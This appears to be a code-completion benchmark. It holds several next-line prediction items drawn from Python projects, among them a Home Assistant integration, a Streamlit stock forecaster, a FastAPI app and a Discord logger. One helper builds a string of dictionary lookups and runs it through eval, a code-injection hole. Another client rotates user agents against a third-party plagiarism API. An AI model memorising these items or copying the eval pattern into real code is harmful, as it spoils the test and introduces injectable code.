        try:
            async with async_timeout.timeout(240):
                return await self.api.update()
        except TimeoutError as err:
            _LOGGER.error("Timeout updating fuel price data: %s", err)
        except TypeError as err:
            _LOGGER.error("Error updating fuel price data: %s", err)
        except Exception as err:
            raise UpdateFailed(f"Error communicating with API {err}") from err

# Path: custom_components/fuel_prices/device_tracker.py
import logging

from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_RADIUS, CONF_NAME
from homeassistant.components.device_tracker.config_entry import (
    BaseTrackerEntity,
    SourceType,
    ATTR_SOURCE_TYPE,
    ATTR_LATITUDE,
    ATTR_LONGITUDE,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
from pyfuelprices.const import PROP_FUEL_LOCATION_SOURCE
from .const import CONF_AREAS, DOMAIN
from .entity import FeulStationEntity
from .coordinator import FuelPricesCoordinator

"""Device tracker for fuel prices."""
from __future__ import annotations

_LOGGER = logging.getLogger(__name__)

async def async_setup_entry(
    hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
    """Integration platform creation."""
cooridinator: FuelPricesCoordinator = hass.data[DOMAIN][entry.entry_id]
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: abdellatif-laghjaj/stock-market-prediction

# Path: services.py
@st.cache_data
def load_data(ticker, start, end):
    """
    Load historical stock price data from Yahoo Finance.

    Parameters:
    - ticker (str): Stock symbol (e.g., AAPL).
    - start (str): Start date in the format 'YYYY-MM-DD'.
    - end (str): End date in the format 'YYYY-MM-DD'.

    Returns:
    - data (pd.DataFrame): DataFrame containing historical stock price data.
    """
    try:
        data = yf.download(ticker, start, end)
        data.reset_index(inplace=True)
        return data
    except Exception as e:
        st.error(f"Error loading data for {ticker}: {str(e)}")
        return None

# Path: services.py
def plot_data(data):
    """
    Plot historical stock price data.

    Parameters:
    - data (pd.DataFrame): DataFrame containing historical stock price data.
    """
    fig = go.Figure()
    fig.add_trace(go.Scatter(x=data['Date'], y=data['Open'], name="stock_open"))
    fig.add_trace(go.Scatter(x=data['Date'], y=data['Close'], name="stock_close"))
    fig.update_layout(title_text="Stock Prices Over Time", xaxis_rangeslider_visible=True)
    st.plotly_chart(fig, use_container_width=True)

# Path: services.py
def plot_multiple_data(data, stock_names):
    """
    Plot forecasted stock prices for multiple stocks.

    Parameters:
    - data (list): List of DataFrames containing forecasted stock price data.
    - stock_names (list): List of stock names corresponding to the forecasted data.
    """
    fig = go.Figure()
    for i, stock_data in enumerate(data):
        fig.add_trace(go.Scatter(x=stock_data['ds'], y=stock_data['yhat'], name=f"yhat - {stock_names[i]}"))
    fig.update_layout(title_text="Stock Prices Over Time", xaxis_rangeslider_visible=True)
    st.plotly_chart(fig, use_container_width=True)

# Path: services.py
def plot_volume(data):
    """
    Plot historical stock volume data.

    Parameters:
    - data (pd.DataFrame): DataFrame containing historical stock volume data.
    """
    fig = go.Figure()
    fig.add_trace(go.Scatter(x=data['Date'], y=data['Volume'], name="stock_volume"))
    fig.update_layout(title_text="Stock Volume Over Time", xaxis_rangeslider_visible=True)
    st.plotly_chart(fig, use_container_width=True)

# Path: main.py
from time import sleep
from sklearn.metrics import mean_absolute_error
from streamlit_option_menu import option_menu
from datetime import date
from prophet import Prophet
from prophet.plot import plot_plotly
from services import load_data, plot_data, plot_multiple_data, plot_volume
import uuid
import pandas as pd
import streamlit as st

# Set page layout to wide
st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈")

# Sidebar
st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True)
st.sidebar.title("Options")
start_date_key = str(uuid.uuid4())
start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key)
end_date = st.sidebar.date_input("End date", date.today())

# Header
st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True)
st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True)

selected_tab = option_menu(
    menu_title=None,
    options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"],
    icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"],
    menu_icon="📊",
    default_index=0,
    orientation="horizontal",
)

# Stock selection
stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL")  # Stocks abreviations
selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks)
selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks)
years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5)
period = years_to_predict * 365

# Display a loading spinner while loading data
with st.spinner("Loading data..."):
data = load_data(selected_stock, start_date, end_date)
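Editor's note: the forecasting step this app builds toward follows the standard Prophet pattern; a hedged sketch, assuming `data` holds the Date/Close columns loaded above and `period` is the horizon in days (this mirrors common Prophet usage, not necessarily the repository's exact code):

df_train = data[["Date", "Close"]].rename(columns={"Date": "ds", "Close": "y"})
model = Prophet()
model.fit(df_train)
future = model.make_future_dataframe(periods=period)
forecast = model.predict(future)  # yhat, yhat_lower, yhat_upper per future date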
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: replicate/cog-marigold

# Path: src/model/rgb_encoder.py
class RGBEncoder(nn.Module):
    """
    The encoder of pretrained Stable Diffusion VAE
    """

    def __init__(self, pretrained_path, subfolder=None) -> None:
        super().__init__()

        vae: AutoencoderKL = AutoencoderKL.from_pretrained(pretrained_path, subfolder=subfolder)
        logging.info(f"pretrained AutoencoderKL loaded from: {pretrained_path}")

        self.rgb_encoder = nn.Sequential(
            vae.encoder,
            vae.quant_conv,
        )

    def to(self, *args, **kwargs):
        self.rgb_encoder.to(*args, **kwargs)

    def forward(self, rgb_in):
        return self.encode(rgb_in)

    def encode(self, rgb_in):
        moments = self.rgb_encoder(rgb_in)  # [B, 8, H/8, W/8]
        mean, logvar = torch.chunk(moments, 2, dim=1)
        rgb_latent = mean
        return rgb_latent

# Path: src/model/stacked_depth_AE.py
class StackedDepthAE(nn.Module):
    """
    Tailored pretrained image VAE for depth map.
        Encode: Depth images are repeated into 3 channels.
        Decode: The average of 3 chennels are taken as output.
    """

    def __init__(self, pretrained_path, subfolder=None) -> None:
        super().__init__()

        self.vae: AutoencoderKL = AutoencoderKL.from_pretrained(pretrained_path, subfolder=subfolder)
        logging.info(f"pretrained AutoencoderKL loaded from: {pretrained_path}")

    def forward(self, depth_in):
        depth_latent = self.encode(depth_in)
        depth_out = self.decode(depth_latent)
        return depth_out

    def to(self, *args, **kwargs):
        self.vae.to(*args, **kwargs)

    @staticmethod
    def _stack_depth_images(depth_in):
        if 4 == len(depth_in.shape):
            stacked = depth_in.repeat(1, 3, 1, 1)
        elif 3 == len(depth_in.shape):
            stacked = depth_in.unsqueeze(1)
            stacked = depth_in.repeat(1, 3, 1, 1)
        return stacked

    def encode(self, depth_in):
        stacked = self._stack_depth_images(depth_in)
        h = self.vae.encoder(stacked)
        moments = self.vae.quant_conv(h)
        mean, logvar = torch.chunk(moments, 2, dim=1)
        depth_latent = mean
        return depth_latent

    def decode(self, depth_latent):
        z = self.vae.post_quant_conv(depth_latent)
        stacked = self.vae.decoder(z)
        depth_mean = stacked.mean(dim=1, keepdim=True)
        return depth_mean

# Path: src/model/marigold_pipeline.py
import logging
import numpy as np
import torch
from typing import Dict
from diffusers import (
    DDIMScheduler,
    DDPMScheduler,
    PNDMScheduler,
    SchedulerMixin,
    UNet2DConditionModel,
)
from torch import nn
from torch.nn import Conv2d
from torch.nn.parameter import Parameter
from tqdm.auto import tqdm
from transformers import CLIPTextModel, CLIPTokenizer
from .rgb_encoder import RGBEncoder
from .stacked_depth_AE import StackedDepthAE

# Author: Bingxin Ke
# Last modified: 2023-12-11

class MarigoldPipeline(nn.Module):
    """
    Marigold monocular depth estimator.
    """

    def __init__(
        self,
        unet_pretrained_path: Dict,  # {path: xxx, subfolder: xxx}
        rgb_encoder_pretrained_path: Dict,
        depht_ae_pretrained_path: Dict,
        noise_scheduler_pretrained_path: Dict,
        tokenizer_pretrained_path: Dict,
        text_encoder_pretrained_path: Dict,
        empty_text_embed=None,
        trainable_unet=False,
        rgb_latent_scale_factor=0.18215,
        depth_latent_scale_factor=0.18215,
        noise_scheduler_type="DDIMScheduler",
        enable_gradient_checkpointing=False,
        enable_xformers=True,
    ) -> None:
        super().__init__()

        self.rgb_latent_scale_factor = rgb_latent_scale_factor
        self.depth_latent_scale_factor = depth_latent_scale_factor
        self.device = "cpu"

        # ******* Initialize modules *******
        # Trainable modules
        self.trainable_module_dic: Dict[str, nn.Module] = {}
        self.trainable_unet = trainable_unet

        # Denoising UNet
        self.unet: UNet2DConditionModel = UNet2DConditionModel.from_pretrained(
            unet_pretrained_path["path"], subfolder=unet_pretrained_path["subfolder"]
        )
        logging.info(f"pretrained UNet loaded from: {unet_pretrained_path}")
        if 8 != self.unet.config["in_channels"]:
            self._replace_unet_conv_in()
            logging.warning("Unet conv_in layer is replaced")
        if enable_xformers:
            self.unet.enable_xformers_memory_efficient_attention()
        else:
            self.unet.disable_xformers_memory_efficient_attention()

        # Image encoder
        self.rgb_encoder = RGBEncoder(
            pretrained_path=rgb_encoder_pretrained_path["path"],
            subfolder=rgb_encoder_pretrained_path["subfolder"],
        )
        logging.info(
            f"pretrained RGBEncoder loaded from: {rgb_encoder_pretrained_path}"
        )
        self.rgb_encoder.requires_grad_(False)

        # Depth encoder-decoder
self.depth_ae = StackedDepthAE(
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: tungeverest/python-k8s-base

# Path: core/middlewares/https/process_time.py
async def process_time_log_middleware(request: Request, call_next):
    """
    This middleware will log all requests and their processing time.
    E.g. log: HOST:PORT - GET /ping 200 OK 1.00ms
    """
    logging.debug("middleware: process_time_log_middleware")
    url = f"{request.method}: {request.url.path}?{request.query_params}" if request.query_params else request.url.path
    start_time = time.time()
    response = await call_next(request)
    process_time = (time.time() - start_time) * 1000
    formatted_process_time = "{0:.2f}".format(process_time)
    host = getattr(getattr(request, "client", None), "host", None)
    port = getattr(getattr(request, "client", None), "port", None)
    response.headers["X-Process-Time"] = formatted_process_time
    try:
        status_phrase = http.HTTPStatus(response.status_code).phrase
    except ValueError:
        status_phrase=""
    logging.info(f'{host}:{port} - "{request.method} {url}" {response.status_code} {status_phrase} {formatted_process_time}ms')
    return response

# Path: core/middlewares/https/rate_limit.py
class RateLimitCoreMiddleware(BaseHTTPMiddleware):
    # TODO apply = Redis
    RATE_LIMIT_DURATION = timedelta(seconds=10)
    RATE_LIMIT_REQUESTS = 5

    def __init__(self, app):
        super().__init__(app)
        # Dictionary to store request counts for each IP
        self.request_counts = {}

    async def dispatch(self, request: Request, call_next):
        # Get the client's IP address
        client_ip = request.client.host

        # Check if IP is already present in request_counts
        request_count, last_request = self.request_counts.get(client_ip, (0, datetime.min))

        # Calculate the time elapsed since the last request
        elapsed_time = datetime.now() - last_request

        if elapsed_time > self.RATE_LIMIT_DURATION:
            request_count = 1
        else:
            if request_count >= self.RATE_LIMIT_REQUESTS:
                return JSONResponse(
                    status_code=429,
                    content={"detail": "Rate limit exceeded. Please try again later."}
                )
            request_count += 1

        # Update the request count and last request timestamp for the IP
        self.request_counts[client_ip] = (request_count, datetime.now())
        response = await call_next(request)
        return response

# Path: src/router.py
def index():

# Path: src/setting.py
@lru_cache()
def get_settings() -> CoreSettings:
    if getenv("_ENV", None) is None:
        raise Exception("Cannot get _ENV environment")
    return CustomSettings()

# Path: src/app.py
import logging
from os import getenv

from core.middlewares.https.process_time import process_time_log_middleware
from core.middlewares.https.rate_limit import RateLimitCoreMiddleware
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from fastapi.middleware.trustedhost import TrustedHostMiddleware
from src.router import router as api_router
from src.setting import get_settings

logger = logging.getLogger(__name__)

def create_app():
    settings = get_settings()
    app = FastAPI(
        title=f"{settings.PROJECT_NAME}",
        version=settings.APP_VERSION,
        debug=settings.DEBUG,
        description=f"""
            FastAPI Framework + K8s \n
            - PROJECT NAME: {settings.PROJECT_NAME} \n
            - VERSION: {settings.APP_VERSION} \n
            - ENV: {settings._ENV} \n
            - DEBUG: {settings.DEBUG} \n
            - API URI: {settings.API_VERSION_PREFIX} \n
        """,
    )
app.include_router(api_router, prefix=settings.API_VERSION_PREFIX)
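Editor's note: the middlewares imported above are presumably wired onto the app next; a speculative sketch of that wiring (hypothetical option values; the repository's real file may differ):

app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],
    allow_methods=["*"],
    allow_headers=["*"],
)
app.add_middleware(RateLimitCoreMiddleware)
app.middleware("http")(process_time_log_middleware)  # register the function-style HTTP middleware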
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: CoolPointerException/Amigo

# Path: gui/input_validator.py
def validate(gui, properties):
    for prop in properties:
        match prop:
            case Properties.PROJECT_NAME:
                project_name = gui.projects_tab.project_name_entry.get()
                if not project_name:
                    messagebox.showerror("Error", "Please enter a project name.")
                    return False
                if project_name in forbidden_names:
                    messagebox.showerror("Error", "Please enter a valid project name. \nForbidden names:\n - " +
                                         "\n - ".join(forbidden_names))
                    return False
            case Properties.SELECTED_DIRECTORY:
                selected_directory = gui.projects_tab.selected_directory
                if not selected_directory:
                    messagebox.showerror("Error", "Please select a directory.")
                    return False
            case Properties.API_TYPE:
                api_type = gui.settings_tab.api_type.get()
                if not api_type:
                    messagebox.showerror("Error", "Please select API type in Settings Tab.")
                    return False
            case Properties.API_BASE:
                api_base = gui.settings_tab.api_host_entry.get()
                if not api_base:
                    messagebox.showerror("Error", "Please enter API base in Settings Tab.")
                    return False
            case Properties.API_VERSION:
                api_version = gui.settings_tab.api_version_entry.get()
                if not api_version:
                    messagebox.showerror("Error", "Please enter API version in Settings Tab.")
                    return False
            case Properties.API_KEY:
                api_key = gui.settings_tab.api_key_entry.get()
                if not api_key:
                    messagebox.showerror("Error", "Please enter API key in Settings Tab.")
                    return False
            case Properties.GPT_MODEL:
                gpt_model = gui.settings_tab.gpt_model.get()
                if not gpt_model:
                    messagebox.showerror("Error", "Please enter GPT model name in Settings Tab.")
                    return False
            case Properties.GPT_DEPLOYMENT:
                gpt_deployment = gui.settings_tab.gpt_deployment.get()
                if not gpt_deployment:
                    messagebox.showerror("Error", "Please enter GPT deployment name in Settings Tab.")
                    return False
            case Properties.EMBEDDING_MODEL:
                embedding_model = gui.settings_tab.embeddings_model_entry.get()
                if not embedding_model:
                    messagebox.showerror("Error", "Please enter embedding model name in Settings Tab.")
                    return False
            case Properties.EMBEDDING_DEPLOYMENT:
                embedding_deployment = gui.settings_tab.embeddings_deployment_entry.get()
                if not embedding_deployment:
                    messagebox.showerror("Error", "Please enter embedding deployment name in Settings Tab.")
                    return False
            case Properties.PROMPT:
                prompt = gui.settings_tab.prompt_entry.get("1.0", tk.END)
                if not prompt:
                    messagebox.showerror("Error", "Please enter a prompt in Settings Tab.")
                    return False
            case Properties.MAX_TOKENS:
                max_tokens = gui.settings_tab.max_tokens.get()
                if not max_tokens:
                    messagebox.showerror("Error", "Please enter max tokens in Settings Tab.")
                    return False
            case Properties.TASK_REQUIREMENTS:
                task_requirements = gui.task_tab.task_requirements_entry.get("1.0", tk.END)
                if not task_requirements:
                    messagebox.showerror("Error", "Please enter a Task requirements.")
                    return False
            case Properties.SELECTED_PROJECT:
                selected_project = gui.task_tab.selected_project.get()
                if not selected_project:
                    messagebox.showerror("Error", "Please select a project.")
                    return False
            case Properties.THREADS:
                threads = gui.settings_tab.threads.get()
                if not threads:
                    messagebox.showerror("Error", "Please enter number of threads in Settings Tab.")
                    return False
            case Properties.REINDEX_PROJECT:
                reindex_project = gui.projects_tab.reindex_project.get()
                if not reindex_project:
                    messagebox.showerror("Error", "Please select a project to reindex.")
                    return False
    return True

# Path: gui/input_validator.py
class Properties(Enum):
    PROJECT_NAME = 1
    SELECTED_DIRECTORY = 2
    API_TYPE = 3
    API_BASE = 4
    API_VERSION = 5
    API_KEY = 6
    GPT_MODEL = 7
    GPT_DEPLOYMENT = 8
    EMBEDDING_MODEL = 9
    EMBEDDING_DEPLOYMENT = 10
    PROMPT = 11
    MAX_TOKENS = 12
    TASK_REQUIREMENTS = 13
    SELECTED_PROJECT = 14
    THREADS = 15
    REINDEX_PROJECT = 16

# Path: gui/llama_index_init.py
from tkinter import messagebox

from llama_index import ServiceContext, set_global_service_context, OpenAIEmbedding
from llama_index.embeddings import AzureOpenAIEmbedding, GeminiEmbedding
from llama_index.llms import Gemini, OpenAI, AzureOpenAI

from gui.input_validator import validate, Properties

def init_llama_index(self, api_type):
    if self.isLlamaInitialized:
        return

    llm = None
    embed_model = None

    if api_type == "azure":
        is_valid = validate(self, [
Properties.API_BASE,
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: redvulpecula/DRILL-Concurrent-Python-1

# Path: video_streaming.py
class VideoStream:
    def __init__(self, url, frames):
        self.frames = frames
        self.url = url
        self.process = Process(target=self.capture, args=(self.frames, self.url))
        self.process.start()

    def capture(self, frames, url):
        cap = cv2.VideoCapture(url)
        error_reported = False
        last_success_time = time.time()
        video_count = 0
        initial_connection_made = False

        while True:
            ret, frame = cap.read()
            if not ret:
                if time.time() - last_success_time > 60:
                    print("Cannot connect to stream for more than 1 minute. Exiting.")
                    break
                if not error_reported:
                    if initial_connection_made:
                        video_count += 1
                        print(f"Finished streaming video number {video_count}.")
                    print("Attempting to reconnect to the next video...")
                    error_reported = True
                last_success_time = time.time()
                cap.release()
                cap = cv2.VideoCapture(url)
                continue

            if not initial_connection_made:
                initial_connection_made = True
            error_reported = False
            if not frames.full():
                frames.put(frame)

    def get_frame(self):
        if not self.frames.empty():
            return self.frames.get()

    def release(self):
        self.process.terminate()
        self.process.join()

# Path: video_streaming.py
def calculate_fps(prev_time, fps):
    while True:
        curr_time = time.time()
        time_diff = curr_time - prev_time
        if time_diff != 0:  # Avoid divide by 0 error
            fps.value = 1 / time_diff
        prev_time = curr_time

# Path: video_streaming.py
def display_and_save_frame(fps_async, fps_stream, frames):
    prev_time = time.time()
    while True:
        frame = frames.get()
        if frame is None:
            break
        curr_time = time.time()
        time_diff = curr_time - prev_time
        if time_diff != 0:
            fps_stream.value = 1 / time_diff
        prev_time = curr_time
        display_fps(frame, fps_async, fps_stream)
        cv2.imshow('RTSP Stream', frame)
        if cv2.getWindowProperty('RTSP Stream', cv2.WND_PROP_VISIBLE) < 1:
            break
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break

# Path: video_streaming.py
def check_rtsp_url(url):
    parsed_url = urlparse(url)
    host = parsed_url.hostname
    port = parsed_url.port if parsed_url.port else 554
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        sock.close()
        return True
    except socket.error:
        return False

# Path: video_streaming.py
def read_url_from_file(file_path='source.txt'):
    with open(file_path, 'r') as file:
        return file.readline().strip()

# Path: imgAlgSelect.py
class YOLOProcessor:
    def __init__(self, frames, yolo_model, device, verbose=False):
        self.frames = frames
        self.yolo_model = yolo_model
        self.device = device
        self.verbose = verbose

    def process(self):
        while True:
            frame = self.frames.get()
            if frame is None:
                break
            results = self.yolo_model(frame, device=self.device, verbose=self.verbose)
            result = results[0]
            bboxes = np.array(result.boxes.xyxy.cpu(), dtype="int")
            classes = np.array(result.boxes.cls.cpu(), dtype="int")
            for cls, bbox in zip(classes, bboxes):
                (x, y, x2, y2) = bbox
                cv2.rectangle(frame, (x, y), (x2, y2), (0, 0, 225), 2)
                cv2.putText(frame, str(cls), (x, y - 5), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 225), 2)
            cv2.imshow('YOLO Model', frame)
            if cv2.getWindowProperty('YOLO Model', cv2.WND_PROP_VISIBLE) < 1:
                break
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break

# Path: main.py
import time
import torch
from multiprocessing import Process, Manager
from ultralytics import YOLO
from video_streaming import VideoStream, calculate_fps, display_and_save_frame, check_rtsp_url, read_url_from_file
from imgAlgSelect import YOLOProcessor

class ConcurrencyManager:
    def __init__(self, url):
        self.device = 'cuda' if torch.backends.cuda.is_built() else 'mps' if torch.backends.mps.is_available() else 'cpu'
        self.yolo_model = YOLO("yolov8m.pt")
        self.manager = Manager()
        self.url = url
        self.frames = self.manager.Queue(maxsize=1)
        self.video_stream = VideoStream(url, self.frames)
        self.fps_async = self.manager.Value('d', 0.0)
        self.fps_stream = self.manager.Value('d', 0.0)

    def start_stream(self):
        print("Waiting for the stream.")
        while not check_rtsp_url(self.url):
            print("Cannot connect to the URL or the port is not open. Retrying.")

        p_fps = Process(target=calculate_fps, args=(time.time(), self.fps_async))
        p_fps.start()

        p_display = Process(target=display_and_save_frame, args=(self.fps_async, self.fps_stream, self.video_stream.frames))
        p_display.start()

        p_yolo = Process(target=YOLOProcessor(self.video_stream.frames, self.yolo_model, self.device).process)
        p_yolo.start()

        p_display.join()
        p_fps.join()
        p_yolo.join()
        self.video_stream.release()

def main():
url = read_url_from_file()
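Editor's note: a standalone single-frame version of the detection loop in YOLOProcessor above (standard ultralytics API; "example.jpg" is a hypothetical input path):

import numpy as np
from ultralytics import YOLO

model = YOLO("yolov8m.pt")                     # same checkpoint as above
results = model("example.jpg", verbose=False)  # ultralytics accepts paths or arrays
boxes = np.array(results[0].boxes.xyxy.cpu(), dtype="int")
classes = np.array(results[0].boxes.cls.cpu(), dtype="int")
print(list(zip(classes, boxes)))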
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: LyubomirT/discord-lle

# Path: colorizer.py
class Colorizer:
    def __init__(self, color):
        self.color = color
        self.colors = {
            "red": "\033[31m",
            "green": "\033[32m",
            "yellow": "\033[33m",
            "blue": "\033[34m",
            "magenta": "\033[35m",
            "cyan": "\033[36m",
            "white": "\033[37m",
            "orange": "\033[38;5;208m",
            "purple": "\033[38;5;135m",
            "pink": "\033[38;5;219m",
            "grey": "\033[38;5;246m",
            "reset": "\033[0m"
        }
        if self.color not in self.colors:
            raise Exception("Color not found")

    def colorize(self, text):
        return self.colors[self.color] + text + self.colors["reset"]

# Path: verify_dir.py
def verify_dir(log_dir):
    # Fully verify the directory structure
    # If it doesn't exist, create it
    # If it does exist, make sure it is empty or follows the correct format
    # Check if the log directory exists
    if not os.path.exists(log_dir):
        os.mkdir(log_dir)
        print(Colorizer("cyan").colorize("Log directory created."))
    else:
        print(Colorizer("cyan").colorize("Log directory already exists. In use."))
    # Check if the DM directory exists
    if not os.path.exists(log_dir + "/DMs"):
        os.mkdir(log_dir + "/DMs")
    # Check if the server directory exists
    if not os.path.exists(log_dir + "/Servers"):
        os.mkdir(log_dir + "/Servers")
    # Check if the DM directory is empty
    if not os.listdir(log_dir + "/DMs"):
        print(Colorizer("cyan").colorize("DM directory is empty."))
    else:
        print(Colorizer("cyan").colorize("DM directory contains log files / other files."))
    # Check if the server directory is empty
    if not os.listdir(log_dir + "/Servers"):
        print(Colorizer("cyan").colorize("Server directory is empty."))
    else:
        print(Colorizer("cyan").colorize("Server directory contains log files / other files."))

# Path: main.py
from dotenv import load_dotenv
from discord.ext import commands
from discord.commands import Option
from discord.ui import Button, View, Select, Modal
from colorizer import Colorizer
from datetime import datetime
from verify_dir import verify_dir
import os
import requests
import json
import discord
import configparser
import asyncio

load_dotenv()

token = os.getenv("BOT_TOKEN")
bot = commands.Bot(command_prefix="!", intents=discord.Intents.all())
log_dir = "_logs_"
dm_config = {
    "enabled": True,
    "download_images": True,
    "download_videos": True,
    "download_audio": True,
}
server_config = {
    "enabled": True,
    "download_images": True,
    "download_videos": True,
    "download_audio": True,
}
printContents = False
logtodms = False
ownerid = 0

def load_config():
    with open("_config_/directories.cfg", "r") as f:
        try:
            config = configparser.ConfigParser()
            config.read_file(f)
        except:
            print(Colorizer("red").colorize("Could not load config! The directories.cfg file is missing or corrupt."))
            os._exit(1)
        global log_dir
        try:
            log_dir = config["directories"]["log_dir"]
        except:
            print(Colorizer("red").colorize("Could not load config! Please specify a proper log directory or use cfg_gen.py to generate a new config file."))
            os._exit(1)
    with open("_config_/types.cfg", "r") as f:
        try:
            config = configparser.ConfigParser()
            config.read_file(f)
        except:
            print(Colorizer("red").colorize("Could not load config! The types.cfg file is missing or corrupt."))
            os._exit(1)
        global dm_config
        try:
            dm_config["enabled"] = bool(config["direct_messages"]["enabled"])
            dm_config["download_images"] = bool(config["direct_messages"]["download_images"])
            dm_config["download_videos"] = bool(config["direct_messages"]["download_videos"])
            dm_config["download_audio"] = bool(config["direct_messages"]["download_audio"])
        except:
            print(Colorizer("red").colorize("Could not load config! Please specify proper types (DM) or use cfg_gen.py to generate a new config file."))
            os._exit(1)
        global server_config
        try:
            server_config["enabled"] = bool(config["servers"]["enabled"])
            server_config["download_images"] = bool(config["servers"]["download_images"])
            server_config["download_videos"] = bool(config["servers"]["download_videos"])
            server_config["download_audio"] = bool(config["servers"]["download_audio"])
        except:
            print(Colorizer("red").colorize("Could not load config! Please specify proper types (server) or use cfg_gen.py to generate a new config file."))
            os._exit(1)
    with open("_config_/misc.cfg", "r") as f:
        try:
            config = configparser.ConfigParser()
            config.read_file(f)
        except:
            print(Colorizer("red").colorize("Could not load config! The misc.cfg file is missing or corrupt."))
            os._exit(1)
        global printContents
        try:
            printContents = bool(config["Console"]["printContents"])
        except:
            print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (printContents) or use cfg_gen.py to generate a new config file."))
            os._exit(1)
        global logtodms
        try:
            logtodms = bool(config["DiscordLog"]["enabled"])
        except:
            print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (logtodms) or use cfg_gen.py to generate a new config file."))
            os._exit(1)
        global ownerid
        try:
            ownerid = int(config["DiscordLog"]["ownerid"])
        except:
            print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (ownerid) or use cfg_gen.py to generate a new config file."))
            os._exit(1)
verify_dir(log_dir)
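Editor's note: the try/except blocks above all follow one configparser pattern; a minimal runnable distillation of it (inline config string instead of the on-disk files):

import configparser

config = configparser.ConfigParser()
config.read_string("[directories]\nlog_dir = _logs_\n")
print(config["directories"]["log_dir"])  # -> _logs_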
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: KR1470R/plagiator-py

# Path: utils/exists.py
def exists(obj, *keys):
    format_keys = "".join(
        list(map(
            lambda key: f"['{key}']",
            keys
        ))
    )
    try:
        return eval(f"obj{format_keys}")
    except Exception:
        return None

# Path: configs/edupirdie.py
API_URI = "https://edubirdie.com/plagiarism-checker-send-data"

# Path: configs/edupirdie.py
HEADERS = {
    "Host": "edubirdie.com",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Referer": "https://edubirdie.com/perevirka-na-plagiat",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": "https://edubirdie.com",
    "DNT": "1",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Connection": "keep-alive",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
}

# Path: utils/plagiator.py
import json
import logging
import requests
from .exists import exists
from configs.edupirdie import API_URI, HEADERS
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem

class Plagiator:
    def __init__(self):
        self.session = requests.Session()
        adapter = requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000)
        self.session.mount("https://", adapter)
        software_names = [software_name.value for software_name in SoftwareName]
        operating_systems = [operating_system.value for operating_system in OperatingSystem]
        self.user_agent_rotator = UserAgent(
            software_names=software_names,
            operating_systems=operating_systems,
            limit=1000
        )

    def concretize_response(self, response: dict):
        if exists(response, "error") and response["error"]:
            return response

        del response["error"]
        del response["error_code"]

        if len(response["title"]) == 0:
            del response["title"]

        words = response["text"].split(" ")

        if exists(response, "highlight") and len(response["highlight"]):
            highlight_text = []
            for span in response["highlight"]:
                span = list(map(int, span))
                selected_words = words[span[0]] if (
                    span[0] == span[1]
                ) else words[span[0]:span[1]]
                if isinstance(selected_words, list):
                    selected_words = " ".join(selected_words)
                highlight_text.append(selected_words)
            response["highlight"] = highlight_text

        if exists(response, "matches") and len(response["matches"]):
            matches_highlight = []
            for match in response["matches"]:
                matched_highlight_text = []
                for match_span in match["highlight"]:
                    match_span = list(map(int, match_span))
                    selected_words = words[match_span[0]] if (
                        match_span[0] == match_span[1]
                    ) else words[match_span[0]:match_span[1]]
                    if isinstance(selected_words, list):
                        selected_words = " ".join(selected_words)
                    matched_highlight_text.append(selected_words)
